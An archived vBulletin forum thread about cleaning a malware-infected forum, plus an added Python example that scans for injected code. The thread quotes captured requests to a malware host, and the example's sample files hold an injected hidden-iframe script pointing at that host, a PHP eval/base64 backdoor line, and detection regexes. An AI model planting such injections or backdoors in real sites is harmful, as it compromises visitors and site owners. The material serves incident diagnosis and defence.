vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
#1  aspen1018  12-20-2013, 01:01 AM
Malware Issue

Chrome is giving a warning that my site is infected with malware. Anybody have any experience with cleaning this up?
#2  ForceHSS  12-20-2013, 01:02 AM

Link to site
#3  aspen1018  12-20-2013, 01:14 AM

http://www.vspotlounge.com/forums/forum.php
#4  Max Taxable  12-20-2013, 01:22 AM

Here's what Google says about it:
Quote:
Safe Browsing
Diagnostic page for vspotlounge.com/forums

What is the current listing status for vspotlounge.com/forums?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 3 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 107 pages we tested on the site over the past 90 days, 99 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-11-20, and the last time suspicious content was found on this site was on 2013-11-04.

Malicious software is hosted on 1 domain(s), including llamaralac1975.tk/.

This site was hosted on 1 network(s) including AS26496 (26496-GO-DADDY-COM-LLC).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, vspotlounge.com/forums appeared to function as an intermediary for the infection of 6 site(s) including bullrunrally.com/, thepicsorbs.com/, uberbets.com/.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Firefox alerted on it as well.

Here's what all your home page is loading:

http://www.webpagetest.org/result/131220_7B_2Z0/

Items 37 and 38 aren't familiar to me, are they to you? Item #4 is an XML application, looks suspicious but renders a 404.
#5  ForceHSS  12-20-2013, 01:38 AM

http://sitecheck.sucuri.net/results/www.vspotlounge.com/forums/forum.php
#6  aspen1018  12-20-2013, 02:29 PM

Quote:
Originally Posted by ForceHSS

Thank you.

I checked those specific pages and couldn't find the code in there.

--------------- Added 12-20-2013, 03:31 PM ---------------

Quote:
Originally Posted by Max Taxable
Items 37 and 38 aren't familiar to me, are they to you? Item #4 is an XML application, looks suspicious but renders a 404.

No, they are not. Have no idea how to clean that up, though.
#7  Max Taxable  12-20-2013, 02:35 PM

Quote:
Originally Posted by aspen1018
No, they are not. Have no idea how to clean that up, though.

Those ARE the malware, as a closer look at the request reveals:
Quote:
GET /tmp/api.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.vspotlounge.com/forums/forum.php
Accept-Language: en-US
X-Download-Initiator: html="doc 0C40 win AAA0; html frame appendChild"
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) PTST/153
Accept-Encoding: gzip, deflate
Host: finansecity.pl
DNT: 1
Connection: Keep-Alive

And appear to be in /tmp/api.php

The second one is in a different location:
Quote:
GET /tmp/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.vspotlounge.com/forums/forum.php
Accept-Language: en-US
X-Download-Initiator: html="doc 0C40 win AAA0; html frame appendChild"
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) PTST/153
Accept-Encoding: gzip, deflate
Host: finansecity.pl
DNT: 1
Connection: Keep-Alive

These files are not part of vBulletin. I think your board has been hacked and you should follow all the protocols for cleaning it.
#8  tbworld  12-20-2013, 02:59 PM

This is known malware; I have seen it several times before, and it is in my library of exploits. Use the standard vBulletin recommendations for eliminating an intrusion. It will work if you follow each step carefully.

Then please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site

Also please see these recent security announcements:
http://www.vbulletin.com/forum/forum...-1-vbulletin-5
http://www.vbulletin.com/forum/forum...d-all-versions
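Worked example, added by the editor; it is not code from this thread, from vBulletin, or from the linked vbulletin.com posts. It ties the captured requests in post #7 to the cleanup tbworld describes: the Host header shows finansecity.pl served /tmp/api.php, so that path is not a file on the forum's own disk, and the initiator value "html frame appendChild" shows a frame was attached to the page by script. What has to be located on the forum is the code doing that, which in vBulletin 4 may be in a PHP file or in a template or plugin; templates and plugins live in the database, so a file grep alone can miss them and a text dump of the template and plugin tables should be scanned as well. The Python below derives the indicator from a constructed copy of the captured request, then scans a directory tree for that host, script-inserted or hidden iframes, script/iframe sources on hosts outside an allowlist, common PHP backdoor constructs, and recently modified files. SITE_HOSTS, the sample tree and the injected snippet in it are assumptions constructed for the demonstration.

```python
"""Hunt for the code behind a third-party load, starting from a captured request.

Added example, not vBulletin tooling.  The capture's Host header names the server that
really served /tmp/api.php, so that path is not on the forum's disk; what must be found
locally is whatever appends a frame pointing at that host, so scan_tree() hunts for that.
"""
import os, re, tempfile, time
from urllib.parse import urlsplit

SITE_HOSTS = {"www.vspotlounge.com", "vspotlounge.com"}  # assumption: the forum's own hosts
# Constructed copy of the first request quoted in the thread (headers trimmed).
CAPTURED_REQUEST = """GET /tmp/api.php HTTP/1.1
Referer: http://www.vspotlounge.com/forums/forum.php
X-Download-Initiator: html="doc 0C40 win AAA0; html frame appendChild"
Host: finansecity.pl
"""

def iocs_from_request(raw):
    """What the capture tells us: serving host, full URL, how the load was triggered."""
    lines = raw.strip().splitlines()
    _method, path, _version = lines[0].split()
    hdrs = {k.strip().lower(): v.strip()
            for k, _, v in (line.partition(":") for line in lines[1:])}
    host, initiator = hdrs.get("host", ""), hdrs.get("x-download-initiator", "")
    return {"host": host, "url": "http://%s%s" % (host, path),
            "frame_by_script": "frame" in initiator and "appendChild" in initiator,
            "on_our_server": host in SITE_HOSTS}

SIGNATURES = {
    # JS that creates a frame and attaches it to the DOM: the initiator seen above.
    "script_inserted_iframe": re.compile(
        r"createElement\s*\(\s*['\"]iframe['\"]\s*\).{0,400}?appendChild", re.I | re.S),
    "hidden_iframe": re.compile(r"<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden|"
                                r"width\s*=\s*['\"]?[01]\b)[^>]*>", re.I),
    "php_eval_decoded": re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}
# A URL used as a script/iframe/embed source, via a tag attribute or a .src assignment.
SRC_URL = re.compile(
    r"(?:<(?:script|iframe|frame|embed|object)[^>]*?\bsrc\s*=\s*|\.src\s*=\s*)"
    r"['\"]?\s*(https?://[^\s'\"<>]+)", re.I)
TEXT_EXT = (".php", ".js", ".html", ".htm", ".sql", ".txt", ".xml", ".inc")

def scan_text(text, ioc_hosts=(), allowed_hosts=SITE_HOSTS):
    """Return [(finding, detail)] for one file's contents."""
    found = [("ioc_host", h) for h in ioc_hosts if h and h in text]
    for name, rx in SIGNATURES.items():
        if m := rx.search(text):
            found.append((name, m.group(0)[:80]))
    for m in SRC_URL.finditer(text):
        host = urlsplit(m.group(1)).hostname or ""
        if host and host not in allowed_hosts:
            found.append(("external_src", m.group(1)))
    return found

def scan_tree(root, ioc_hosts=(), modified_after=None):
    """Walk root; return {relative_path: findings} for files that need a human look."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path, found = os.path.join(dirpath, fn), []
            if modified_after is not None and os.path.getmtime(path) > modified_after:
                found.append(("recently_modified", time.ctime(os.path.getmtime(path))))
            if fn.lower().endswith(TEXT_EXT):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found.extend(scan_text(fh.read(), ioc_hosts))
            if found:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return report

# Constructed sample tree (path, body, age in days): a clean config, a dump holding an
# injected template modelled on the initiator above, and a backdoor dropped recently.
SAMPLE_FILES = [
    ("includes/config.php", "<?php\n$config['Database']['dbname'] = 'vbulletin';\n", 400),
    ("dump/template_plugin.sql",
     "INSERT INTO `template` VALUES (12,'headinclude','<script>"
     "var f=document.createElement(\"iframe\");f.src=\"http://finansecity.pl/tmp/api.php\";"
     "f.style.display=\"none\";document.body.appendChild(f);</script>');\n", 400),
    ("images/misc/cache.php", "<?php eval(base64_decode($_POST['p'])); ?>\n", 3),
]

def build_sample_tree():
    root = tempfile.mkdtemp(prefix="vb_scan_")
    for rel, body, age_days in SAMPLE_FILES:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        mtime = time.time() - age_days * 86400
        os.utime(path, (mtime, mtime))
    return root

def demo():
    """Derive the IOC from the capture, then scan the sample tree with it."""
    ioc = iocs_from_request(CAPTURED_REQUEST)
    return scan_tree(build_sample_tree(), ioc_hosts=[ioc["host"]],
                     modified_after=time.time() - 30 * 86400)

if __name__ == "__main__":
    print(iocs_from_request(CAPTURED_REQUEST), *sorted(demo().items()), sep="\n")
```

Against a real install, point scan_tree() at the web root after exporting the template and plugin tables to a .sql file inside it, and set modified_after to the last known-good date. Every hit is something to read, not proof on its own, and the scan only finds what it has patterns for; the reliable end of the cleanup is still comparing the file list and contents against a fresh download of the same vBulletin version, removing anything that is not in it, and changing every admin, FTP and database password afterwards.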
All times are GMT.

